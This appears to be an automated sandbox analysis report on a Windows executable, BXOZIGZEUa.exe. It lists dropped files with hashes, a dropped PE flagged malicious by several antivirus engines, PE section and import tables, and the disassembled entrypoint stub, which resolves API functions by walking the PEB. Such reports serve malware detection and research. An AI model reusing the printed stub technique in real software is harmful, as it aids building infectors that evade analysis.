                                                                Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.8.0.6.9.9.6.7.8.0.2.0.5.6.7.2.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.8.0.6.9.9.6.7.9.1.6.1.1.9.3.7.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.1.f.8.6.2.b.9.f.-.9.f.8.4.-.4.8.6.2.-.8.f.2.a.-.e.2.d.1.5.8.5.e.9.6.2.a.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.4.b.1.7.e.c.a.c.-.1.2.5.5.-.4.1.1.3.-.8.8.2.d.-.5.1.b.3.b.8.d.7.6.a.b.6.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.J.d.E.V...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.e.7.8.-.0.0.0.1.-.0.0.1.3.-.4.0.b.3.-.8.2.2.b.c.1.6.0.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.a.2.4.d.b.6.7.8.b.c.8.d.1.6.8.1.4.c.0.e.8.0.0.3.e.d.4.1.4.d.c.2.0.0.0.0.f.f.f.f.!.0.0.0.0.9.9.e.e.3.1.c.d.4.b.0.d.6.a.4.b.6.2.7.7.9.d.a.3.6.e.0.e.e.e.c.d.d.8.0.5.8.9.f.c.!.J.d.E.V...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.1.3././.1.1.
                                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                                File Type:Mini DuMP crash report, 15 streams, Tue Jan 7 05:01:18 2025, 0x1205a4 type
                                                                Category:dropped
                                                                Size (bytes):169128
                                                                Entropy (8bit):1.761960533477816
                                                                Encrypted:false
                                                                SSDEEP:768:8YIW/mtBttDL7/mc8vvC2tH8fy3Gd+n+g:8A/mO5KC8fyNn+g
                                                                MD5:7BE23ECA26B4C54E274E3F8704C6290B
                                                                SHA1:7B9CC88C18A22A66949F297A0A6CC8B207BEEE49
                                                                SHA-256:A6861C6CBFA55B137C1562D1764D5773A2F5A02CC5640819C7A21D942EF15A2F
                                                                SHA-512:D490EDBD22D1B47EDDB3CB45C163A91F0FE91360A69A8ECC7D1CC01D36A3321B79E8805E201653ADC20ACD5FBB86A96C86DA9B173965F35884D3DE08825B1433
                                                                Malicious:false
                                                                Reputation:low
                                                                Preview:MDMP..a..... .........|g............t.......................<...,!......t....Q..........`.......8...........T...........@>..hV..........h!..........T#..............................................................................eJ.......#......GenuineIntel............T.......x.....|g.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                                File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                Category:dropped
                                                                Size (bytes):6256
                                                                Entropy (8bit):3.7193291305423744
                                                                Encrypted:false
                                                                SSDEEP:192:R6l7wVeJ8C56WYYwwWuqBpDO89bMJsfGkm:R6lXJ8c6pYwwWZMifc
                                                                MD5:B6ECCFED0F4BDE3496596D6D8ECF619A
                                                                SHA1:5FD5BB4F81BBD7140816BAEE0CD4F6D8FF104A72
                                                                SHA-256:895346079DED69558521EBA12D8D27E6D6BA7649690C9C11683592654392CF7E
                                                                SHA-512:DA724F07E9623E3FE2978062B0CF54BBD859F94DF91E8F1046ADEFD5F81E09C751DAC966FE9DF618AAD14F7C7B406E3EBC72E213CD37C0F7DA9843800A886FB0
                                                                Malicious:false
                                                                Reputation:low
                                                                Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.8.0.0.<./.P.i.
                                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                                File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                Category:dropped
                                                                Size (bytes):4537
                                                                Entropy (8bit):4.442795914005458
                                                                Encrypted:false
                                                                SSDEEP:48:cvIwWl8zsPqJg77aI9M/WpW8VYkYm8M4JwGFq+q8m9U0zgqhQd:uIjfP4I72u7VkJc1U0zgqhQd
                                                                MD5:ADE30EFBC5A0191157926B272D617658
                                                                SHA1:514A5A73415994A7ACD928711884D5AB845F633F
                                                                SHA-256:B5496741C294EC2E5527E8124B51E750CB618919D65F0F7A6C94221D93A2DD1C
                                                                SHA-512:C8A069C0CDA809D1A836AAC71F841E3DB4E0A6EF7D424BDE285067F2C067AB94476FE05A520734ACE12E6BDAB30F3E075A82151B51BF380F634C62764C2DE074
                                                                Malicious:false
                                                                Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="665043" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                                Process:C:\Users\user\AppData\Local\Temp\JdEV.exe
                                                                File Type:ASCII text
                                                                Category:dropped
                                                                Size (bytes):4
                                                                Entropy (8bit):1.5
                                                                Encrypted:false
                                                                SSDEEP:3:Nv:9
                                                                MD5:D3B07384D113EDEC49EAA6238AD5FF00
                                                                SHA1:F1D2D2F924E986AC86FDF7B36C94BCDF32BEEC15
                                                                SHA-256:B5BB9D8014A0F9B1D61E21E796D78DCCDF1352F23CD32812F4850B878AE4944C
                                                                SHA-512:0CF9180A764ABA863A67B6D72F0918BC131C6772642CB2DCE5A34F0A702F9470DDC2BF125C12198B1995C233C34B4AFD346C54A2334C350A948A51B6E8B4E6B6
                                                                Malicious:false
                                                                Preview:foo.
                                                                Process:C:\Users\user\AppData\Local\Temp\JdEV.exe
                                                                File Type:ASCII text
                                                                Category:dropped
                                                                Size (bytes):4
                                                                Entropy (8bit):1.5
                                                                Encrypted:false
                                                                SSDEEP:3:Nv:9
                                                                MD5:D3B07384D113EDEC49EAA6238AD5FF00
                                                                SHA1:F1D2D2F924E986AC86FDF7B36C94BCDF32BEEC15
                                                                SHA-256:B5BB9D8014A0F9B1D61E21E796D78DCCDF1352F23CD32812F4850B878AE4944C
                                                                SHA-512:0CF9180A764ABA863A67B6D72F0918BC131C6772642CB2DCE5A34F0A702F9470DDC2BF125C12198B1995C233C34B4AFD346C54A2334C350A948A51B6E8B4E6B6
                                                                Malicious:false
                                                                Preview:foo.
                                                                Process:C:\Users\user\AppData\Local\Temp\JdEV.exe
                                                                File Type:ASCII text
                                                                Category:dropped
                                                                Size (bytes):4
                                                                Entropy (8bit):1.5
                                                                Encrypted:false
                                                                SSDEEP:3:Nv:9
                                                                MD5:D3B07384D113EDEC49EAA6238AD5FF00
                                                                SHA1:F1D2D2F924E986AC86FDF7B36C94BCDF32BEEC15
                                                                SHA-256:B5BB9D8014A0F9B1D61E21E796D78DCCDF1352F23CD32812F4850B878AE4944C
                                                                SHA-512:0CF9180A764ABA863A67B6D72F0918BC131C6772642CB2DCE5A34F0A702F9470DDC2BF125C12198B1995C233C34B4AFD346C54A2334C350A948A51B6E8B4E6B6
                                                                Malicious:false
                                                                Preview:foo.
                                                                Process:C:\Users\user\AppData\Local\Temp\JdEV.exe
                                                                File Type:ASCII text
                                                                Category:modified
                                                                Size (bytes):4
                                                                Entropy (8bit):1.5
                                                                Encrypted:false
                                                                SSDEEP:3:Nv:9
                                                                MD5:D3B07384D113EDEC49EAA6238AD5FF00
                                                                SHA1:F1D2D2F924E986AC86FDF7B36C94BCDF32BEEC15
                                                                SHA-256:B5BB9D8014A0F9B1D61E21E796D78DCCDF1352F23CD32812F4850B878AE4944C
                                                                SHA-512:0CF9180A764ABA863A67B6D72F0918BC131C6772642CB2DCE5A34F0A702F9470DDC2BF125C12198B1995C233C34B4AFD346C54A2334C350A948A51B6E8B4E6B6
                                                                Malicious:false
                                                                Preview:foo.
                                                                Process:C:\Users\user\Desktop\BXOZIGZEUa.exe
                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):15872
                                                                Entropy (8bit):7.031113762428177
                                                                Encrypted:false
                                                                SSDEEP:384:7XZQaD7U8iu4YsAa7ZA0UvH2lsRv21yW7GbAxur6+Y9PffPz:1QGPL4vzZq2o9W7GsxBbPr
                                                                MD5:56B2C3810DBA2E939A8BB9FA36D3CF96
                                                                SHA1:99EE31CD4B0D6A4B62779DA36E0EEECDD80589FC
                                                                SHA-256:4354970CCC7CD6BB16318F132C34F6A1B3D5C2EA7FF53E1C9271905527F2DB07
                                                                SHA-512:27812A9A034D7BD2CA73B337AE9E0B6DC79C38CFD1A2C6AC9D125D3CC8FA563C401A40D22155811D5054E5BAA8CF8C8E7E03925F25FA856A9BA9DEA708D15B4E
                                                                Malicious:true
                                                                Antivirus:
                                                                • Antivirus: Avira, Detection: 100%
                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                • Antivirus: ReversingLabs, Detection: 97%
                                                                Joe Sandbox View:
                                                                • Filename: ArjM1qx3hV.exe, Detection: malicious, Browse
                                                                • Filename: aRxo3E278B.exe, Detection: malicious, Browse
                                                                • Filename: yRc7UfFif9.exe, Detection: malicious, Browse
                                                                • Filename: gT6IitwToH.exe, Detection: malicious, Browse
                                                                • Filename: #U65b0#U7248#U7f51#U5173.exe, Detection: malicious, Browse
                                                                • Filename: #U8865#U4e01#U6253#U5305.exe, Detection: malicious, Browse
                                                                • Filename: #U65b0#U7248#U7f51#U5173Srv.exe, Detection: malicious, Browse
                                                                • Filename: gE4NVCZDRk.exe, Detection: malicious, Browse
                                                                • Filename: ib.exe, Detection: malicious, Browse
                                                                • Filename: SecuriteInfo.com.Win32.Malware-gen.17468.9520.exe, Detection: malicious, Browse
                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......z.I.>.'.>.'.>.'..7\.2.'...(.?.'.>.&.y.'.Q.#.=.'..).?.'.7...6.'.7...?.'.Rich>.'.................PE..L...JG.R.............................`.......0....@.......................................@..................................p...............................o.......................................................................................text.... ..........................`....rdata.......0......................@....data........@......................@....reloc.......P.......(..............@....aspack.. ...`.......,..............`....adata...............>..............@...................................................................................................................................................................................................................................................................................................
                                                                Process:C:\Users\user\Desktop\BXOZIGZEUa.exe
                                                                File Type:Windows Precompiled iNF, version 3.3 (Windows 10), flags 0x1000083, unicoded, has strings, at 0x1158 "Signature", at 0x68 WinDirPath, LanguageID 809
                                                                Category:dropped
                                                                Size (bytes):5884
                                                                Entropy (8bit):3.2100538689449323
                                                                Encrypted:false
                                                                SSDEEP:96:16T0jnDWLlB9Su3H75DjLocg8IwJR56mXkR/1fszenFWhH:sCyZSuXVDjLor8IwJRMm0wzOEp
                                                                MD5:5F167C05E471EB855F876E5F670AA73C
                                                                SHA1:88BE1D17384EE549AAE791F326C35F60D194C1A6
                                                                SHA-256:4FAF06C683C2F6680B0B3F73C6A99E3FD84014CC2BD3DB6863F56F288F3FD13F
                                                                SHA-512:CF8CCDCCBF16BF10B91B0DE0076369CA3985EDB1976616F57C82783685AC890C8FA5A388AC2066163B6B9119BA9C0DE4FE6ED39161DF0B3DF06C2555AC9F8076
                                                                Malicious:false
                                                                Preview:................H...X....d..................................h...,.......0.......h.......................C.:.\.W.i.n.d.o.w.s.........................................................................................................\...................................................................|.......................|...........................................................................................................................................................................`.......H.......................................................................L...................................................................................................................@...........................................................................................................................................................h.......................t...................................................................................................................................
                                                                Process:C:\Users\user\Desktop\BXOZIGZEUa.exe
                                                                File Type:Windows Precompiled iNF, version 3.3 (Windows 10), flags 0x1000083, unicoded, has strings, at 0x1100 "Signature", at 0x68 WinDirPath, LanguageID 809
                                                                Category:dropped
                                                                Size (bytes):5740
                                                                Entropy (8bit):3.173847699149194
                                                                Encrypted:false
                                                                SSDEEP:96:EHv3dP0/4NiuIR0ONNjnuUw8u5pF6KXkRQ1fsCncekSDzD:E1viuCVDjuT8u5p4K05CcWDzD
                                                                MD5:3821A155A04A6A2E4811B60BEE95BA38
                                                                SHA1:76E66DB688BD24BC907D7EF90A951D4CD74FB710
                                                                SHA-256:6931E4EA0B4B6C80DA549F8EAA738639FBC03590B0429C773C5E6D75085E80D4
                                                                SHA-512:DF33A4829683F534C505FADC7BE5BB2899614A42FE85446ABA8593D4C13D065C25871557563F9F3D7F1BAEA4927788B184573B9A8CC4C248BA873AEB8D0E1B18
                                                                Malicious:false
                                                                Preview:................H..................................H...............(.......H...h...............h.......C.:.\.W.i.n.d.o.w.s.....x...................................................$...............................................................................................................d...(...........................................................................................................................................................................................................................................................x...................................................................$...............................................................................................4...........................0.......................................................................................................................................................................................................p...........................................................
                                                                Process:C:\Users\user\Desktop\BXOZIGZEUa.exe
                                                                File Type:Windows Precompiled iNF, version 3.3 (Windows 10), flags 0x1000083, unicoded, has strings, at 0x1210 "Signature", at 0x68 WinDirPath, LanguageID 809
                                                                Category:dropped
                                                                Size (bytes):6284
                                                                Entropy (8bit):3.210060094944142
                                                                Encrypted:false
                                                                SSDEEP:96:f4rgQY2e/NI0IXSu6o4zvM181fQ1UvZUuQSCUJ:b2e/BfosxZUK/
                                                                MD5:37B7D5A41FF318D021B72C680E68CC3B
                                                                SHA1:69977EC82CFD33B3A06BA4DD06553CE6E8FDD256
                                                                SHA-256:81E03C26AA1707F2019E050037D31F89B80F808CE9F4C5CE804FC43BE1E22355
                                                                SHA-512:F112FF23C1542737CB3A519C862F9A746F7922BD0983B942A03099942D23C8AD219B02A2ACD6F4C2E442E8A23009C0E460238A69DE7331FD1A071FC4E78353C3
                                                                Malicious:false
                                                                Preview:................X........K.}........................h.......p...D.......d... ...h.......................C.:.\.W.i.n.d.o.w.s.............................................................................................................................................................................................................H...........................................8.......................................H.......................................................................................................................................................................................................................................,.......................................................................................................................................................................................................................................................................................................h...............................................8...........
                                                                Process:C:\Users\user\AppData\Local\Temp\JdEV.exe
                                                                File Type:MS Windows registry file, NT/2000 or above
                                                                Category:dropped
                                                                Size (bytes):1835008
                                                                Entropy (8bit):4.2987269006200926
                                                                Encrypted:false
                                                                SSDEEP:6144:sECqOEmWfd+WQFHy/9026ZTyaRsCDusBqD5dooi8lMSD6VJSR1M:pCsL6seqD5SpSWVARK
                                                                MD5:DCA0323FD27A848F1231ADA65D9267E1
                                                                SHA1:67B37F28790DD435F35B5D6F4B245B60E42AF332
                                                                SHA-256:D174D043F7E33191E75FA6C80F8B20A95D96BD36399D228A32F17C93360CB602
                                                                SHA-512:AA58222CFDF0E8187DA484E53D377B7F128B3F838777A6E476C76AA0A8B96886F6EEF178D4A22E8A286BE385037A69A7E071E1079031B7052C75E3FCFA85023A
                                                                Malicious:false
                                                                Preview:regfE...E....\.Z.................... ....`......\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtmN..,.`..............................................................................................................................................................................................................................................................................................................................................)..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                File type:PE32 executable (console) Intel 80386, for MS Windows
                                                                Entropy (8bit):6.426054235926492
                                                                TrID:
                                                                • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                • Generic Win/DOS Executable (2004/3) 0.02%
                                                                • DOS Executable Generic (2002/1) 0.02%
                                                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                File name:BXOZIGZEUa.exe
                                                                File size:1'700'352 bytes
                                                                MD5:fa07873f37b171a5567a9b4b3f2c65eb
                                                                SHA1:47d5210522d8c54d3076c1467f2f495025037bb6
                                                                SHA256:8f5469d96f148afd08a0f693684f9bb0195a5291eb2437214c01465b463acbf8
                                                                SHA512:68a8f289ea6acdd7b79595cd8f7cde9ff468f2e26b56e1b7cef024b8a999f834a94e43c165a5a9b0c4b42008afb7b9446b29aa2019c68133d65409d631c19f29
                                                                SSDEEP:49152:XE4XbjEKOh3SbiwJjn7gu5LUvdW9apuLvht/cionurM0EIMa1:Xrj834iwJjn7gu5LmMapuNiiMurM0
                                                                TLSH:96759D3136908077C67B32319B9AA3FDB6F9A5304D35524B56A10E3C2E709D3A92C76F
                                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......7Nd.s/..s/..s/..zW..r/..zW.../..h..._/..h..../..h.......zW..V/..s/...-..h...q/..h...r/..h...r/..Richs/..........PE..L.....q]...
                                                                Icon Hash:90cececece8e8eb0
                                                                Entrypoint:0x5a6000
                                                                Entrypoint Section:uY
                                                                Digitally signed:false
                                                                Imagebase:0x400000
                                                                Subsystem:windows cui
                                                                Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                Time Stamp:0x5D71F817 [Fri Sep 6 06:09:27 2019 UTC]
                                                                TLS Callbacks:
                                                                CLR (.Net) Version:
                                                                OS Version Major:5
                                                                OS Version Minor:1
                                                                File Version Major:5
                                                                File Version Minor:1
                                                                Subsystem Version Major:5
                                                                Subsystem Version Minor:1
                                                                Import Hash:6f75980df73bd959bec9fcfb664cfd02
                                                                Instruction
                                                                push ebp
                                                                mov ebp, esp
                                                                sub esp, 0000016Ch
                                                                xor eax, eax
                                                                push ebx
                                                                push esi
                                                                push edi
                                                                mov dword ptr [ebp-24h], eax
                                                                mov dword ptr [ebp-10h], eax
                                                                mov dword ptr [ebp-14h], eax
                                                                mov dword ptr [ebp-08h], eax
                                                                mov dword ptr [ebp-0Ch], eax
                                                                mov dword ptr [ebp-20h], eax
                                                                mov dword ptr [ebp-18h], eax
                                                                mov dword ptr [ebp-48h], 5645644Ah
                                                                mov dword ptr [ebp-44h], 6578652Eh
                                                                mov dword ptr [ebp-40h], 00000000h
                                                                mov dword ptr [ebp-3Ch], 00000000h
                                                                call 00007F39A8EC23A5h
                                                                pop eax
                                                                add eax, 00000225h
                                                                mov dword ptr [ebp-04h], eax
                                                                mov eax, dword ptr fs:[00000030h]
                                                                mov dword ptr [ebp-28h], eax
                                                                mov eax, dword ptr [ebp-04h]
                                                                mov dword ptr [eax], E904C483h
                                                                mov eax, dword ptr [ebp-04h]
                                                                mov dword ptr [eax+04h], FFF58236h
                                                                mov eax, dword ptr [ebp-28h]
                                                                mov eax, dword ptr [eax+0Ch]
                                                                mov eax, dword ptr [eax+1Ch]
                                                                mov eax, dword ptr [eax]
                                                                mov eax, dword ptr [eax+08h]
                                                                mov ecx, dword ptr [eax+3Ch]
                                                                mov ecx, dword ptr [ecx+eax+78h]
                                                                add ecx, eax
                                                                mov edi, dword ptr [ecx+1Ch]
                                                                mov ebx, dword ptr [ecx+20h]
                                                                mov esi, dword ptr [ecx+24h]
                                                                mov ecx, dword ptr [ecx+18h]
                                                                add esi, eax
                                                                add edi, eax
                                                                add ebx, eax
                                                                xor edx, edx
                                                                mov dword ptr [ebp-30h], esi
                                                                mov dword ptr [ebp-1Ch], edx
                                                                mov dword ptr [ebp-34h], ecx
                                                                cmp edx, dword ptr [ebp-34h]
                                                                jnc 00007F39A8EC24EEh
                                                                movzx ecx, word ptr [esi+edx*2]
                                                                mov edx, dword ptr [ebx+edx*4]
                                                                mov esi, dword ptr [edi+ecx*4]
                                                                add edx, eax
                                                                mov ecx, dword ptr [edx]
                                                                add esi, eax
                                                                cmp ecx, 4D746547h
                                                                jne 00007F39A8EC23F4h
                                                                cmp dword ptr [edx+04h], 6C75646Fh
                                                                jne 00007F39A8EC23EBh
                                                                Programming Language:
                                                                • [C++] VS2008 SP1 build 30729
                                                                • [ C ] VS2008 SP1 build 30729
                                                                • [ASM] VS2010 SP1 build 40219
                                                                • [ C ] VS2010 SP1 build 40219
                                                                • [C++] VS2010 SP1 build 40219
                                                                • [IMP] VS2008 SP1 build 30729
                                                                • [RES] VS2010 SP1 build 40219
                                                                • [LNK] VS2010 SP1 build 40219
                                                                NameVirtual AddressVirtual Size Is in Section
                                                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_IMPORT0x1692500x168.rdata
                                                                IMAGE_DIRECTORY_ENTRY_RESOURCE0x17b0000x6d8.rsrc
                                                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_BASERELOC0x17c0000x1a450.reloc
                                                                IMAGE_DIRECTORY_ENTRY_DEBUG0x128d400x1c.rdata
                                                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x152ba00x40.rdata
                                                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_IAT0x1280000x934.rdata
                                                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                .text0x10000x1268a30x126a00f488be5fc3a676598f8a364845853fadFalse0.5610067750318201data6.539294700431528IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                .rdata0x1280000x444ba0x44600e3d187bee7a20b52c8a5aa950dc5959cFalse0.27052745086837293data5.047397246056738IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                .data0x16d0000xdb040x60002f590fbdc2c5ab2e1fce65b7a0243ebbFalse0.2849934895833333data4.7641816505688IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                .rsrc0x17b0000x6d80x80018b01f74d64d681072db0f41366c4eb8False0.353515625data4.6625627260129IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                .reloc0x17c0000x293f40x294003edbefab711cfe5d831cbd18bbf4c4bdFalse0.26879142992424243data4.982795266679088IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                uY0x1a60000x50000x42000cbe2dac05299bb6514c66d11d100775False0.7771070075757576data6.933836062310107IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                RT_STRING0x17b0e80x3edataEnglishUnited States0.6612903225806451
                                                                RT_VERSION0x17b1280x344dataChineseChina0.4258373205741627
                                                                RT_MANIFEST0x17b46c0x26aASCII text, with very long lines (618), with no line terminatorsEnglishUnited States0.43042071197411
                                                                DLLImport
                                                                SETUPAPI.dllSetupGetStringFieldW, SetupDiDestroyDeviceInfoList, SetupDiCallClassInstaller, SetupDiGetDeviceRegistryPropertyW, SetupDiEnumDeviceInfo, SetupDiGetClassDevsW, SetupFindNextLine, SetupCloseInfFile, SetupFindFirstLineW, SetupOpenInfFileW, SetupUninstallOEMInfW
                                                                KERNEL32.dllIsProcessorFeaturePresent, HeapCreate, FreeEnvironmentStringsW, IsValidCodePage, QueryPerformanceCounter, GetStringTypeW, GetTimeZoneInformation, GetConsoleMode, EnumSystemLocalesA, IsValidLocale, WriteConsoleW, GetDriveTypeW, SetEnvironmentVariableA, CreateFileA, GetConsoleCP, GetLocaleInfoA, LCMapStringW, GetOEMCP, GetACP, GetCPInfo, GetStartupInfoW, GetStdHandle, SetHandleCount, IsDebuggerPresent, SetUnhandledExceptionFilter, UnhandledExceptionFilter, TerminateProcess, GetFileType, GetProcessHeap, SetStdHandle, VirtualQuery, GetSystemInfo, VirtualAlloc, GetSystemTimeAsFileTime, HeapSize, HeapQueryInformation, CreateThread, ExitThread, HeapReAlloc, RaiseException, ExitProcess, RtlUnwind, HeapAlloc, HeapSetInformation, HeapFree, DecodePointer, EncodePointer, FindResourceExW, GetUserDefaultLCID, VirtualProtect, GetNumberFormatW, SearchPathW, Sleep, GetProfileIntW, GetTickCount, GetFileTime, GetFileSizeEx, GetFileAttributesExW, GetTempPathW, GetTempFileNameW, GetFullPathNameW, GetVolumeInformationW, GetCurrentProcess, DuplicateHandle, GetFileSize, SetEndOfFile, UnlockFile, LockFile, FlushFileBuffers, SetFilePointer, WriteFile, ReadFile, CreateFileW, lstrcmpiW, FreeResource, GlobalFindAtomW, InitializeCriticalSectionAndSpinCount, lstrlenA, GlobalGetAtomNameW, GetCurrentProcessId, GlobalAddAtomW, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileIntW, InterlockedIncrement, TlsFree, DeleteCriticalSection, LocalReAlloc, TlsSetValue, TlsAlloc, InitializeCriticalSection, GlobalHandle, GlobalReAlloc, EnterCriticalSection, TlsGetValue, LeaveCriticalSection, CompareStringW, GlobalFlags, InterlockedDecrement, ReleaseActCtx, CreateActCtxW, GetVersionExW, lstrcpyW, GetSystemDirectoryW, GetCurrentDirectoryW, WaitForSingleObject, ResumeThread, SetThreadPriority, CloseHandle, FileTimeToLocalFileTime, FileTimeToSystemTime, FindFirstFileW, FindNextFileW, FindClose, GlobalFree, CopyFileW, GlobalSize, GlobalUnlock, FormatMessageW, MulDiv, SetErrorMode, lstrcmpA, GlobalDeleteAtom, GetCurrentThread, GetCurrentThreadId, GetModuleFileNameW, GetUserDefaultUILanguage, ConvertDefaultLocale, GetSystemDefaultUILanguage, ActivateActCtx, LoadLibraryW, DeactivateActCtx, SetLastError, MultiByteToWideChar, GlobalLock, lstrcmpW, GlobalAlloc, GetProcAddress, FreeLibrary, GetLocaleInfoW, LoadLibraryExW, InterlockedExchange, LocalAlloc, LocalFree, SetFileAttributesW, GetFileAttributesW, DeleteFileW, WideCharToMultiByte, lstrlenW, GetLastError, GetWindowsDirectoryW, FindResourceW, LoadResource, LockResource, SizeofResource, GetModuleHandleW, GetCommandLineW, GetEnvironmentStringsW
